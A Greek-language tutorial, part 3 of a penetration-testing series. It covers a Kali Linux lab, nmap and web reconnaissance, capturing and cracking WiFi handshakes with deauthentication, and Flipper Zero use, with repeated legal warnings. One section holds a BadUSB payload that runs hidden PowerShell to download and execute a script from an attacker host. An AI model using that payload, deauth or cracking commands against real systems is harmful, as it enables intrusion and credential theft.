Η Πορεία του Hacker: Σειρά 5 Μερών
Μέρος 1: Εισαγωγή → Μέρος 2: Κατάκτηση του Flipper → Μέρος 3: Βασικά του Kali → Μέρος 4: Εκμετάλλευση → Μέρος 5: Ο Πλήρης Έλεγχος
Στα Μέρη 1 και 2, κλωνοποιήσατε κάρτες, αναλύσατε ραδιοσυχνότητες και καταλάβατε γιατί η περισσότερη "ασφάλεια" είναι θέατρο. Είδατε τα τρωτά σημεία από έξω. Τώρα μπαίνετε μέσα και τα βλέπετε από τη σκοπιά του επιτιθέμενου.
Το Kali Linux είναι η βιομηχανική πρότυπη διανομή για penetration testing. Έρχεται προεγκατεστημένο με πάνω από 600 εργαλεία ασφαλείας. Αυτό μπορεί να φαίνεται συντριπτικό. Τα περισσότερα tutorials σε ρίχνουν στα βαθιά με εντολές που δεν καταλαβαίνεις και χωρίς πλαίσιο για το γιατί έχουν σημασία.
Εδώ κάνουμε τα πράγματα διαφορετικά. Μέχρι το τέλος αυτού του άρθρου, θα έχετε ένα λειτουργικό εργαστήριο, θα κατανοείτε την αναγνώριση δικτύου σε θεμελιώδες επίπεδο και θα έχετε καταγράψει το δικό σας WiFi handshake. Κάθε βήμα χτίζει πάνω στο προηγούμενο.
Μέρος 1: Χτίζοντας το Εργαστήριό σας
Οι επαγγελματίες penetration testers δεν τρέχουν Kali στο κύριο μηχάνημά τους. Χρησιμοποιούν απομονωμένα περιβάλλοντα που μπορούν να επαναφερθούν, να αποθηκευτούν ως snapshot και να καταστραφούν χωρίς να επηρεάσουν το κύριο σύστημα. Θα κάνετε το ίδιο.
Επιλογή Α: Εικονική Μηχανή (Συνιστάται για Εκμάθηση)
Μια εικονική μηχανή σας δίνει το ασφαλέστερο περιβάλλον εκμάθησης. Μπορείτε να αποθηκεύσετε snapshots της προόδου σας, να κάνετε λάθη και να επαναφέρετε αμέσως.
Τι Θα Χρειαστείτε
- Κεντρικό μηχάνημα: 16GB+ RAM, 50GB+ ελεύθερο χώρο δίσκου, σύγχρονο CPU με υποστήριξη virtualization
- Λογισμικό virtualization: VirtualBox (δωρεάν) ή VMware Workstation Player (δωρεάν για προσωπική χρήση)
- Kali Linux: Επίσημο προκατασκευασμένο VM από kali.org
Έργο: Εγκατάσταση Kali VM
Χρόνος: 30-45 λεπτά
Βήματα:
- Κατεβάστε το Kali VM image για τον hypervisor σας (VirtualBox ή VMware)
- Εξάγετε το αρχείο που κατεβάσατε (συνιστάται 7-Zip για Windows)
- Εισάγετε το VM στον hypervisor σας
- Ρυθμίστε πόρους: τουλάχιστον 4GB RAM (συνιστάται 8GB), 2+ πυρήνες CPU
- Ενεργοποιήστε τον network adapter σε "Bridged" mode για πλήρη πρόσβαση στο δίκτυο
- Εκκινήστε το VM και συνδεθείτε με τα προεπιλεγμένα credentials:
kali/kali - Ανοίξτε τερματικό και τρέξτε:
sudo apt update && sudo apt full-upgrade -y - Δημιουργήστε ένα snapshot με όνομα "Fresh Install" για εύκολη ανάκτηση
Επαλήθευση επιτυχίας: Μπορείτε να ανοίξετε τερματικό, να τρέξετε whoami και να δείτε kali.
Επιλογή Β: Αποκλειστικό Hardware (Για Σοβαρή Εξάσκηση)
Μόλις νιώσετε άνετα με το Kali, το αποκλειστικό hardware αφαιρεί τo overhead του VM και επιτρέπει πλήρη πρόσβαση στο hardware, κάτι που είναι απαραίτητο για ασύρματο testing.
Προτάσεις Hardware
| Οικονομική επιλογή | Μεταχειρισμένο ThinkPad X230/T430 ($100-150), Intel WiFi αντικατεστημένο με Atheros AR9285 |
|---|---|
| Σύγχρονη επιλογή | Framework Laptop με Linux-compatible WiFi module |
| Αποκλειστικός αισθητήρας | Raspberry Pi 5 4GB με εξωτερικό Alfa AWUS036ACH adapter |
Προς το παρόν, ένα VM είναι τέλειο. Το αποκλειστικό hardware γίνεται σημαντικό όταν χρειάζεστε monitor mode για ασύρματο testing (καλύπτεται αργότερα σε αυτό το άρθρο).
Επιλογή Γ: Live USB (Μηδενική Αποθήκευση)
Ένα live USB τρέχει Kali απευθείας χωρίς εγκατάσταση. Τα πάντα εξαφανίζονται όταν κλείσετε τη συσκευή. Χρήσιμο για testing σε διαφορετικό hardware, αλλά θα χάνετε τη δουλειά σας κάθε συνεδρία εκτός αν δημιουργήσετε ένα persistent partition.
1# Create bootable USB on Linux/Mac
2sudo dd if=kali-linux-*.iso of=/dev/sdX bs=4M status=progress
3# Replace sdX with your USB device (check with 'lsblk')
4# On Windows: Use Rufus or balenaEtcherΤο dd Καταστρέφει Δεδομένα
Η εντολή dd γράφει απευθείας στον δίσκο χωρίς επιβεβαίωση. Ελέγξτε τριπλά το όνομα της συσκευής. Αν γράψετε στη λάθος συσκευή, θα σβήσει τα πάντα σε εκείνον τον δίσκο.
Μέρος 2: Η Νοοτροπία του Terminal
Πριν αγγίξουμε εργαλεία ασφαλείας, πρέπει να νιώθετε άνετα στο terminal. Αυτό δεν είναι προαιρετικό. Το GUI υπάρχει στο Kali, αλλά η πραγματική δουλειά γίνεται στη γραμμή εντολών.
Βασική Πλοήγηση
1# Know where you are
2pwd # Print working directory
3
4# Move around
5cd /home/kali # Go to home directory
6cd .. # Go up one level
7cd - # Go to previous directory
8
9# See what's here
10ls # List files
11ls -la # List all files with details
12ls -lah # Human-readable sizes
13
14# Read files
15cat filename # Display entire file
16less filename # Scrollable view (q to quit)
17head -n 20 filename # First 20 lines
18tail -f filename # Follow file in real-time (logs)Κλιμάκωση Δικαιωμάτων
Πολλά εργαλεία ασφαλείας απαιτούν root πρόσβαση. Στο Kali, το sudo σας δίνει προσωρινά root δικαιώματα.
1sudo command # Run single command as root
2sudo -i # Start root shell (be careful)
3whoami # Check current user
4id # Show user and group IDsRoot με Υπευθυνότητα
Η εκτέλεση ως root σημαίνει μηδενικά δίχτυα ασφαλείας. Ένα τυπογραφικό λάθος όπως rm -rf / θα καταστρέψει τα πάντα. Το σύγχρονο Kali αποτρέπει αυτή τη συγκεκριμένη εντολή, αλλά η αρχή παραμένει: κατανοήστε τι τρέχετε πριν το τρέξετε.
Διαχείριση Διεργασιών
1ps aux # All running processes
2top # Real-time process viewer
3htop # Better process viewer (install if needed)
4
5# Control processes
6ctrl+c # Stop current process
7ctrl+z # Suspend process
8bg # Resume in background
9fg # Bring to foreground
10
11# Kill processes
12kill PID # Graceful termination
13kill -9 PID # Force kill (last resort)Εντολές Δικτύου
1ip a # Show network interfaces
2ip route # Show routing table
3ping -c 4 8.8.8.8 # Test connectivity
4curl ifconfig.me # Your public IP
5
6# DNS lookups
7nslookup google.com
8dig google.comΈργο: Εξοικείωση με το Terminal
Χρόνος: 15 λεπτά
Εργασίες:
- Βρείτε τη διεύθυνση IP σας στο τοπικό δίκτυο χρησιμοποιώντας
ip a - Εντοπίστε το default gateway σας χρησιμοποιώντας
ip route - Κάντε ping στο gateway σας για να επιβεβαιώσετε τη συνδεσιμότητα
- Δείτε όλα τα αρχεία στο
/etcταξινομημένα κατά χρόνο τροποποίησης:ls -lt /etc | head - Διαβάστε τις πρώτες 50 γραμμές του
/etc/passwd:head -n 50 /etc/passwd
Στόχος: Πρέπει να μπορείτε να πλοηγείστε, να ελέγχετε την κατάσταση δικτύου και να διαβάζετε αρχεία χωρίς να σκέφτεστε.
Μέρος 3: Αναγνώριση Δικτύου με Nmap
Το Nmap (Network Mapper) είναι το πιο σημαντικό εργαλείο που θα μάθετε. Ανακαλύπτει hosts, αναγνωρίζει υπηρεσίες, εντοπίζει λειτουργικά συστήματα και χαρτογραφεί την τοπολογία δικτύου. Όλα τα υπόλοιπα χτίζονται πάνω στα αποτελέσματα του nmap.
Η Πρώτη σας Σάρωση
Ας σαρώσουμε το δικό σας δίκτυο. Πρώτα, εντοπίστε το εύρος του δικτύου σας:
1# Find your local IP and subnet
2ip a | grep inet
3# Look for something like: inet 192.168.1.100/24
4# The /24 means your network is 192.168.1.0-2551# Basic discovery scan (your network only)
2sudo nmap -sn 192.168.1.0/24
3
4# What this does:
5# -sn = ping scan (no port scanning, just host discovery)
6# /24 = scan all 256 addresses in this subnetΘα δείτε αποτέλεσμα σαν αυτό:
1Nmap scan report for 192.168.1.1
2Host is up (0.0025s latency).
3MAC Address: AA:BB:CC:DD:EE:FF (Manufacturer Name)
4
5Nmap scan report for 192.168.1.50
6Host is up (0.0042s latency).
7MAC Address: 11:22:33:44:55:66 (Another Manufacturer)Αυτή η πρώτη σάρωση σας λέει: "Αυτές οι συσκευές υπάρχουν στο δίκτυό μου." Τώρα ας κάνουμε πιο βαθιές ερωτήσεις.
Ανίχνευση Υπηρεσιών
Μόλις ξέρετε ποιοι hosts υπάρχουν, θέλετε να μάθετε ποιες υπηρεσίες τρέχουν.
1# Scan a single target for open ports and services
2sudo nmap -sV 192.168.1.1
3# -sV = Version detection (probe open ports for service info)Συνηθισμένο αποτέλεσμα:
1PORT STATE SERVICE VERSION
222/tcp open ssh OpenSSH 8.4p1
380/tcp open http nginx 1.18.0
4443/tcp open ssl/http nginx 1.18.0Ανίχνευση Λειτουργικού Συστήματος
1# Detect OS (requires root)
2sudo nmap -O 192.168.1.1
3
4# Combined scan: OS detection + service versions + default scripts
5sudo nmap -A 192.168.1.1Κατανόηση Καταστάσεων Θυρών
Το Nmap αναφέρει θύρες σε διάφορες καταστάσεις:
- open - Εφαρμογή που δέχεται ενεργά συνδέσεις. Αυτό ψάχνουν οι επιτιθέμενοι.
- closed - Η θύρα είναι προσβάσιμη αλλά καμία εφαρμογή δεν ακούει. Ο host λειτουργεί αλλά δεν υπάρχει τίποτα εκεί.
- filtered - Firewall ή φίλτρο μπλοκάρει τον έλεγχο. Δεν μπορεί να προσδιοριστεί αν είναι ανοιχτή ή κλειστή.
- unfiltered - Η θύρα είναι προσβάσιμη αλλά το nmap δεν μπορεί να κρίνει αν είναι ανοιχτή ή κλειστή.
Τύποι Σάρωσης και Αόρατη Προσέγγιση
1# TCP Connect scan (default, noisy but reliable)
2sudo nmap -sT target
3
4# SYN scan (stealthier, default with root)
5sudo nmap -sS target
6
7# UDP scan (slow but important - many services use UDP)
8sudo nmap -sU target
9
10# Scan all 65535 ports (thorough but slow)
11sudo nmap -p- target
12
13# Scan specific ports
14sudo nmap -p 22,80,443,8080 target
15
16# Top 1000 common ports (default behavior)
17sudo nmap targetNmap Scripting Engine (NSE)
Το NSE επεκτείνει το nmap με εξειδικευμένα scripts για ανίχνευση ευπαθειών, απαρίθμηση υπηρεσιών και πολλά ακόμη.
1# Run default safe scripts
2sudo nmap -sC target
3
4# Check for vulnerabilities
5sudo nmap --script vuln target
6
7# SMB enumeration (Windows shares)
8sudo nmap --script smb-enum-shares target
9
10# HTTP enumeration
11sudo nmap --script http-enum target
12
13# List available scripts
14ls /usr/share/nmap/scripts/ | head -20Έργο: Χαρτογραφήστε το Δίκτυό σας
Χρόνος: 30 λεπτά
Προαπαιτούμενα: Γνωρίζετε το εύρος του δικτύου σας από ip a
- Ανακαλύψτε όλους τους hosts:
sudo nmap -sn YOUR_NETWORK/24 - Καταγράψτε τους hosts που ανακαλύφθηκαν και τις MAC διευθύνσεις τους
- Επιλέξτε τον router σας (συνήθως .1) και τρέξτε:
sudo nmap -sV -sC YOUR_ROUTER - Εντοπίστε όλες τις ανοιχτές θύρες και υπηρεσίες στον router σας
- Τρέξτε
sudo nmap -A YOUR_COMPUTERγια να δείτε τι εκθέτει το δικό σας μηχάνημα
Τεκμηρίωση: Δημιουργήστε ένα αρχείο κειμένου που καταγράφει κάθε συσκευή, τη διεύθυνση IP της, τη MAC και τις υπηρεσίες. Αυτός είναι ο χάρτης του δικτύου σας.
Σαρώνετε Μόνο Δίκτυα που σας Ανήκουν
Η σάρωση δικτύων χωρίς εξουσιοδότηση είναι παράνομη στις περισσότερες δικαιοδοσίες. Ακόμα και μια απλή σάρωση nmap μπορεί να θεωρηθεί μη εξουσιοδοτημένη πρόσβαση. Μείνετε στο δικό σας δίκτυο, τον δικό σας εξοπλισμό και δίκτυα όπου έχετε ρητή γραπτή άδεια.
Μέρος 4: Αναγνώριση Web
Η σάρωση nmap σας πιθανότατα βρήκε HTTP υπηρεσίες (θύρες 80, 443, 8080). Ας κατανοήσουμε τι τρέχει εκεί.
Whatweb: Γρήγορη Αναγνώριση Υπηρεσίας
# Identify web technologies
whatweb http://192.168.1.1Παράδειγμα αποτελέσματος:
1http://192.168.1.1 [200 OK] Country[RESERVED][ZZ],
2HTTPServer[nginx/1.18.0], IP[192.168.1.1],
3Title[Router Admin], nginx[1.18.0]Nikto: Σαρωτής Ευπαθειών Web
1# Scan for common web vulnerabilities
2nikto -h http://192.168.1.1
3
4# This checks for:
5# - Outdated server software
6# - Dangerous files/CGIs
7# - Misconfigurations
8# - Default credentialsΑπαρίθμηση Καταλόγων: Τι Κρύβεται;
Οι web servers συχνά έχουν καταλόγους που δεν συνδέονται από την κύρια σελίδα: πίνακες διαχείρισης, αρχεία ρυθμίσεων, αρχεία backup.
# Gobuster: directory brute-forcing
gobuster dir -u http://192.168.1.1 -w /usr/share/wordlists/dirb/common.txtΣυνηθισμένα ευρήματα:
1/admin (Status: 301)
2/backup (Status: 403)
3/config (Status: 200)
4/login (Status: 200)Τοποθεσία Wordlists
Το Kali περιλαμβάνει εκτεταμένες wordlists στο /usr/share/wordlists/. Οι πιο συνηθισμένοι κατάλογοι: dirb/, dirbuster/, rockyou.txt (κωδικοί πρόσβασης), και seclists/ (ολοκληρωμένη συλλογή).
Έργο: Ελέγξτε το Web Interface του Router σας
Χρόνος: 20 λεπτά
- Τρέξτε
whatweb http://YOUR_ROUTER_IPγια να αναγνωρίσετε τον server - Τρέξτε
nikto -h http://YOUR_ROUTER_IPγια να ελέγξετε για ευπάθειες - Τρέξτε
gobuster dir -u http://YOUR_ROUTER_IP -w /usr/share/wordlists/dirb/small.txt - Επισκεφτείτε τυχόν ανακαλυφθέντες καταλόγους στον browser
- Σημειώστε τυχόν πίνακες διαχείρισης, αριθμούς εκδόσεων ή ενδιαφέροντα ευρήματα
Συνηθισμένο εύρημα: Σελίδες διαχείρισης router εκτεθειμένες με προεπιλεγμένα credentials.
Μέρος 5: Ασύρματη Αναγνώριση
Εδώ τα πράγματα γίνονται ενδιαφέροντα. Τα δίκτυα WiFi εκπέμπουν συνεχώς, και με τα σωστά εργαλεία, μπορείτε να καταγράψετε handshakes αυθεντικοποίησης: την κρυπτογραφημένη ανταλλαγή που συμβαίνει όταν μια συσκευή συνδέεται.
Απαιτήσεις Hardware
Το ενσωματωμένο WiFi σας πιθανότατα δεν θα δουλέψει γι' αυτό. Χρειάζεστε έναν adapter που υποστηρίζει monitor mode και packet injection. Συνιστάται: Alfa AWUS036ACH ($50) ή Alfa AWUS036ACM ($45). Αυτά δουλεύουν αμέσως με το Kali.
Κατανόηση του Monitor Mode
Η κανονική λειτουργία WiFi ("managed mode") λαμβάνει μόνο πακέτα που απευθύνονται στη συσκευή σας. Το monitor mode καταγράφει όλα τα πακέτα στην εμβέλεια, την κίνηση κάθε συσκευής στο κανάλι.
1# Check your wireless interfaces
2iwconfig
3# Look for your adapter (often wlan0 or wlan1)
4
5# Kill interfering processes
6sudo airmon-ng check kill
7
8# Enable monitor mode
9sudo airmon-ng start wlan0
10# Your interface is now wlan0monΣάρωση για Δίκτυα
1# Start capturing wireless traffic
2sudo airodump-ng wlan0mon
3
4# You'll see:
5# BSSID = Router MAC address
6# PWR = Signal strength (higher = closer)
7# CH = Channel
8# ENC = Encryption (WPA2, WPA3, OPN)
9# ESSID = Network name
10
11# Press Ctrl+C to stopΑυτό που βλέπετε είναι κάθε δίκτυο WiFi σε εμβέλεια, τις ρυθμίσεις ασφαλείας τους, και συχνά τις συσκευές που είναι συνδεδεμένες σε αυτά. Αυτό βλέπει ένας war driver όταν σαρώνει γειτονιές.
Καταγραφή Handshake
Όταν μια συσκευή συνδέεται σε δίκτυο WPA2, γίνεται ένα four-way handshake. Αν καταγράψετε αυτό το handshake, μπορείτε να προσπαθήσετε να σπάσετε τον κωδικό offline.
1# Focus on your target network (your own network!)
2sudo airodump-ng -c CHANNEL --bssid ROUTER_MAC -w capture wlan0mon
3# -c CHANNEL = Target's channel from previous scan
4# --bssid = Target router's MAC address
5# -w capture = Save to files starting with "capture"
6
7# Now wait for a device to connect...
8
9# Or force a reconnection (on YOUR network only):
10# In a new terminal:
11sudo aireplay-ng --deauth 5 -a ROUTER_MAC wlan0mon
12# This sends 5 deauth packets, disconnecting clients
13# They automatically reconnect, generating a handshakeΌταν καταγράψετε ένα handshake, το airodump-ng δείχνει [ WPA handshake: XX:XX:XX:XX:XX:XX ] στην πάνω δεξιά γωνία.
Οι Επιθέσεις Deauth Είναι Παράνομες
Η αποστολή πακέτων deauthentication σε δίκτυα που δεν σας ανήκουν είναι ομοσπονδιακό αδίκημα βάσει του Computer Fraud and Abuse Act (στις ΗΠΑ) και παρόμοιων νόμων αλλού. Δοκιμάζετε μόνο στο δικό σας δίκτυο. Ο σκοπός είναι να κατανοήσετε την ευπάθεια, όχι να επιτεθείτε σε άλλους.
Σπάσιμο του Handshake
Με ένα καταγεγραμμένο handshake, μπορείτε να προσπαθήσετε να σπάσετε τον κωδικό offline χρησιμοποιώντας μια wordlist:
1# Crack using a wordlist
2aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.cap
3
4# If the password is in the wordlist, you'll see:
5# KEY FOUND! [ password123 ]
6
7# For stronger passwords, use hashcat (GPU-accelerated)
8# First, convert capture format:
9cap2hccapx capture-01.cap capture.hccapx
10
11# Then crack with hashcat:
12hashcat -m 22000 capture.hccapx /usr/share/wordlists/rockyou.txtΠραγματικότητα Ισχύος Κωδικών
Το rockyou.txt περιέχει 14+ εκατομμύρια κωδικούς πρόσβασης από πραγματικές παραβιάσεις δεδομένων. Αν ο κωδικός WiFi σας είναι "password123" ή "summer2024" ή το όνομα του σκύλου σας, μπορεί να σπάσει σε δευτερόλεπτα. Ένας τυχαίος κωδικός 12+ χαρακτήρων θα χρειαζόταν εκατομμύρια χρόνια για brute-force.
Έργο: Δοκιμάστε την Ασφάλεια του WiFi σας
Χρόνος: 45 λεπτά
Προαπαιτούμενα: Εξωτερικός WiFi adapter με υποστήριξη monitor mode
- Ενεργοποιήστε monitor mode:
sudo airmon-ng start wlan0 - Σαρώστε για δίκτυα:
sudo airodump-ng wlan0mon - Σημειώστε το κανάλι και BSSID του δικού σας δικτύου
- Καταγράψτε στο κανάλι σας:
sudo airodump-ng -c CHANNEL --bssid YOUR_BSSID -w mywifi wlan0mon - Επανασυνδέστε μια συσκευή στο WiFi σας (ή χρησιμοποιήστε deauth στο ΔΙΚΟ ΣΑΣ δίκτυο)
- Επιβεβαιώστε τη λήψη του handshake
- Δοκιμάστε κατά του rockyou.txt:
aircrack-ng -w /usr/share/wordlists/rockyou.txt mywifi-01.cap
Αποτέλεσμα: Αν βρέθηκε ο κωδικός σας, αλλάξτε τον αμέσως σε κάτι τυχαίο και μεγάλο (20+ χαρακτήρες).
Μέρος 6: Σύνδεση του Flipper Zero σας
Θυμάστε όλες εκείνες τις καταγραφές από το Μέρος 2; Ας τις ενσωματώσουμε στη ροή εργασίας σας με το Kali.
Μεταφορά Αρχείων
1# Connect Flipper via USB
2# It appears as a mass storage device
3
4# Mount if not auto-mounted
5sudo mount /dev/sda1 /mnt/flipper
6
7# Your captures are in:
8/mnt/flipper/subghz/ # Sub-GHz captures
9/mnt/flipper/nfc/ # NFC dumps
10/mnt/flipper/infrared/ # IR captures
11/mnt/flipper/lfrfid/ # 125kHz RFID
12/mnt/flipper/badusb/ # BadUSB scriptsΑνάλυση NFC Dumps
1# Install libnfc tools
2sudo apt install libnfc-bin mfoc mfcuk
3
4# Flipper saves NFC as .nfc text format
5# Convert to binary for analysis:
6python3 flipper_nfc_to_mfd.py card.nfc card.mfd
7
8# Analyze MIFARE Classic dump
9hexdump -C card.mfd | lessΑνάλυση Sub-GHz
1# Flipper's .sub files are text-based
2cat garage_door.sub
3
4# Contains:
5# - Frequency (315MHz, 433MHz, etc.)
6# - Protocol or RAW data
7# - Timing information
8
9# For deeper RF analysis, use:
10# - Universal Radio Hacker (URH)
11# - GNU Radio
12# - rtl_433 (with SDR hardware)Ανάπτυξη BadUSB
Δημιουργήστε BadUSB payloads στο Kali, δοκιμάστε τα στο Flipper:
1# Flipper uses DuckyScript-compatible syntax
2# Create payload on Kali:
3cat > kali_connect.txt << 'EOF'
4DELAY 1000
5GUI r
6DELAY 500
7STRING powershell -nop -w hidden -c "IEX(New-Object Net.WebClient).DownloadString('http://YOUR_KALI_IP:8000/shell.ps1')"
8ENTER
9EOF
10
11# Host the payload from Kali:
12python3 -m http.server 8000
13
14# Copy to Flipper's badusb folder
15cp kali_connect.txt /mnt/flipper/badusb/Τα BadUSB Payloads Είναι Ισχυρά
Αυτά τα scripts εκτελούνται αυτόματα όταν συνδεθούν. Ένα κακόβουλο payload θα μπορούσε να εγκαταστήσει backdoors, να κλέψει credentials ή να καταστρέψει δεδομένα σε δευτερόλεπτα. Χρησιμοποιείτε μόνο στα δικά σας μηχανήματα για testing. Μην αφήνετε ποτέ το Flipper σας κάπου που κάποιος άλλος μπορεί να το συνδέσει.
Μέρος 7: Τεκμηρίωση και Ροή Εργασίας
Οι επαγγελματίες penetration testers δεν τρέχουν απλά εργαλεία. Τεκμηριώνουν τα πάντα. Η καλή τεκμηρίωση ξεχωρίζει τους ερασιτέχνες από τους επαγγελματίες.
Καταγραφή Σημειώσεων με CherryTree
1# Install CherryTree (hierarchical note-taking)
2sudo apt install cherrytree
3
4# Organize notes by:
5# - Target/network
6# - Reconnaissance
7# - Enumeration
8# - Vulnerabilities
9# - Exploitation attempts
10# - Post-exploitationΑποθήκευση Αποτελεσμάτων Nmap
1# Save in all formats
2sudo nmap -sV -sC -oA scan_results target
3
4# Creates:
5# scan_results.nmap (human-readable)
6# scan_results.xml (parseable)
7# scan_results.gnmap (greppable)Καταγραφή Συνεδρίας
1# Log entire terminal session
2script session_$(date +%Y%m%d_%H%M%S).log
3
4# Now every command and output is recorded
5# Type 'exit' to stop loggingΗ Πορεία του Hacker
Μια σειρά 5 μερών που σας μεταφέρει από περίεργους σε ικανούς.
Μέρος 1: Εισαγωγή Μέρος 2: Κατάκτηση του Flipper Μέρος 3: Βασικά του Kali ✓ Μέρος 4: Εκμετάλλευση Μέρος 5: Πλήρης Έλεγχος
Λίστα Ελέγχου Μέρους 3
☐ Εγκατάσταση Εργαστηρίου: Kali VM σε λειτουργία, ενημερωμένο, snapshot αποθηκευμένο
☐ Terminal: Άνετα με πλοήγηση, δικαιώματα, έλεγχο διεργασιών
☐ Nmap: Δίκτυο χαρτογραφημένο, υπηρεσίες αναγνωρισμένες, router σαρωμένος
☐ Web Recon: Web interface router αναλυμένο με whatweb/nikto
☐ Ασύρματα: Monitor mode ενεργοποιημένο, δίκτυα σαρωμένα
☐ Handshake: Δικό σας WiFi handshake καταγεγραμμένο και δοκιμασμένο
☐ Flipper: Αρχεία μεταφερμένα, ροή εργασίας κατανοητή
☐ Τεκμηρίωση: Σημειώσεις οργανωμένες, σαρώσεις αποθηκευμένες
Τι Ακολουθεί
Χτίσατε το εργαστήριό σας και μάθατε τη φάση αναγνώρισης. Μπορείτε να ανακαλύψετε hosts, να αναγνωρίσετε υπηρεσίες και να καταγράψετε ασύρματα handshakes. Κατανοείτε τι βλέπουν οι επιτιθέμενοι όταν κοιτάνε ένα δίκτυο.
Στο Μέρος 4, περνάμε από την αναγνώριση στην εκμετάλλευση. Θα μάθετε:
- Metasploit Framework, το ελβετικό σουγιά της εκμετάλλευσης
- Κοινές ροές εργασίας εκμετάλλευσης ευπαθειών
- Τεχνικές post-exploitation: τι συμβαίνει μετά την αρχική πρόσβαση
- Κλιμάκωση δικαιωμάτων: από απλός χρήστης σε διαχειριστή
- Pivoting: χρήση ενός παραβιασμένου συστήματος για επίθεση σε άλλα
Η αναγνώριση σας λέει πού είναι οι πόρτες. Η εκμετάλλευση σας μαθαίνει πώς να τις ανοίγετε.
Χαρτογραφήσατε το έδαφος. Τώρα μαθαίνετε να πλοηγείστε σε αυτό. Το Μέρος 4 σας μεταφέρει από παρατηρητή σε χειριστή.
Τα λέμε στο Μέρος 4.